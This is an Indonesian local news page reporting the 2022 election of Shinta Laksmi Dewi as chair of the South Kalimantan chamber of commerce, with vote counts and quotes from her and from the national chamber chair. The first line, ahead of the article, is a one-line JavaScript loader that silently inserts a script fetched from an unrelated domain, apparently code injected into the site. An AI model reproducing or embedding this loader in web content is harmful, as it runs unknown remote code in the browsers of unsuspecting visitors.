(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Musprov Rampung, Shinta Laksmi Dewi Pimpin Kadin Kalsel Periode 2022-2027


KANALKALIMANTAN.COM, BANJARMASIN – Hasil Musyawarah Provinsi (Musprov) VII Kadin (Kamar Dagang dan Industri) Kalimantan Selatan di Hotel Rattan In Banjarmasin menetapkan Hj Shinta Laksmi Dewi secara aklamasi menjadi Ketua Umum (Ketum) Kadin Kalsel, Senin (12/9/2022) malam.

Sebelumnya dua nama yang dijagokan yakni Hj Shinta Laksmi Dewi SE sebagai nomor 1 dan nomor 2 adalah H Saridi Salimin MM telah melalui serangkaian proses Musprov.

Muprov VII Kadin Kalsel digelar untuk memilih Ketum Kadin Provinsi Kalsel sekaligus promatur periode 2022-2027 ini dihadiri ketua dan pengurus Kadin dari 13 kabupaten/kota yang berhasil dihimpun menjadi 68 suara.

Dari kertas suara tersebut, Shinta Laksmi unggul dengan memperoleh suara sebanyak 37 suara. Sedangkan Saridi Salimin memperoleh sebanyak 31 suara.

 

 

Baca juga: BREAKING NEWS. Organda Blokade Parkiran Terminal Simpang 4 Banjarbaru, 2 Unit BRT Banjarbakula Ditahan!

Shinta dipastikan menjabat sebagai ketua umum dan sudah menerima hasil Musprov Kadin Kalsel 2022.

Seusai acara bertempat di Hotel Rattan In, Banjarmasin, Shinta menyampaikan tugas diriknya yang akan menyusun kepengurusan baru.

“Bersyukur Alhamdulillah atas amanah yang diberikan dari buah hasil kebersamaan yang terjalin. Selanjutnya, yang tak kalah penting, juga dengan bantuan kepengurusan di kabupaten/kota dapat membangun Kadin sesuai dengan visi misi kita,” katanya.

Ketua Umum Kadin Kalsel 2022-2027 Hj Shinta Laksmi Dewi SE. Foto: wanda

Shinta Laksmi dalam pertemuan dengan awak media pada Senin (12/9/2022) malam, mengatakan dirinya sudah mengikuti semua proses musprov, mulai dari pendaftaran, penetapan, visi misi, hingga pemilihan.

Ia pun siap berkontribusi dalam pembangunan ekonomi Kalsel sesuai dengan kapasitasnya. Ia juga mengatakan akan konsisten dalam mendorong dan mengawal akselerasi ekonomi Kalsel.

“Tugas kami selanjutnya tentang organisasi akan menyusun kepengurusan Kadin Kalsel masa jabatan 2022-2027, kemudian konsolidasi,” sambung Shinta.

Baca juga: Dua Kios Meubel dan Kios Ponsel di Banjarmasin Dilahap Si Jago Merah

Ke depan, Shinta juga mengatakan bahwa pihaknya akan melakukan sinergi dengan menjajaki partnership, pemangku kepentingan yang ada, hingga pemberdayaan pengusaha-pengusaha lokal untuk bisa naik kelas ke tingkat nasional.

Sementara itu, Ketua Umum Kadin Indonesia, M Arsjad Rasjid meminta agar bersama sama mengupayakan bertahan di era pasca pandemi untuk maju mensejahterakan masyarakat.

“Supaya bisa bertahan, di sinilah persatuan dan kesatuan kita antara pengusaha pemerintah hingga masyarakat semua komponen supaya kita lebih inovatif dan kreatif dalam menggelar agenda menghidupkan ekonomi di Kalsel,” ujar Ketua Umum Kadin Indonesia, M Arsjad Rasjid saat diwawancarai terpisah.

Ketua Umum Kadin Indonesia, M Arsjad Rasjid. Foto: wanda

Ia berpesan agar Ketua Kadin Kalsel terpilih dapat terus bertanding membangun ekonomi Kalsel dengan bergotong royong bersama.

“Ekonomi pasca pandemi maupun saat era pandemi ini tugas Kadin tidak mudah dan kita suarakan kita perlu bertanding, kita perlu membangun semua ini secara gotong royong bersama sama,” pesan Arsjad.

Musprov VII Kadin Kalsel ini dilaksanakan sejak siang hingga malam dengan agenda opening ceremony oleh Gubernur Kalsel Sahbirin Noor, penyampaian visi misi hingga terpilihnya Shinta Laksmi sebagai Ketua Kadin Kalsel ditandai dengan penyerahan hasil Musprov dan pengibaran pataka. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

3 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

5 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

5 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

6 jam ago

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

6 jam ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

7 jam ago

This website uses cookies.